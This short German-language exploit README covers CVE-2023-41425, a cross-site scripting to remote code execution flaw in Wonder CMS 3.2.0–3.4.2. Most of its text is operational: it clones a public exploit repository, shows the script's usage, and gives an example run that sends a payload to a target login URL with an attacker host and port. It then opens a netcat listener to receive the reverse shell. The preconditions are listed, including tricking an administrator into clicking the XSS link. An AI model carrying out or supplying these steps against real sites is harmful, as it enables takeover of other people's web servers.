
CVE-2023-41425 - Cross-Site Scripting Sicherheitslücke in Wonder CMS v.3.2.0 bis v.3.4.2 ermöglicht es einem entfernten Angreifer, beliebigen Code über ein manipuliertes Skript auszuführen, das in die installModule-Komponente hochgeladen wird.
Cross-Site-Scripting-Sicherheitslücke in Wonder CMS v.3.2.0 bis v.3.4.2 ermöglicht es einem entfernten Angreifer, beliebigen Code auszuführen, indem ein manipuliertes Skript in die installModule-Komponente hochgeladen wird. Nur für Bildungszwecke
Erfordert Kenntnis der loginURL, Administratorzugriff oder die Möglichkeit, den Admin dazu zu bringen, auf den XSS-Link zu klicken.
git clone https://github.com/thefizzyfish/CVE-2023-41425-wonderCMS_RCE.git
usage: CVE-2023-41425.py [-h] -rhost RHOST -lhost LHOST -lport LPORT -sport SPORT
python3 CVE-2023-41425.py -rhost http://example.com/loginURL -lhost 10.10.14.7 -lport 9001 -sport 8000
nc -lnvp 9001

prodigiousMind für das Entdecken und Melden der Sicherheitslücke https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413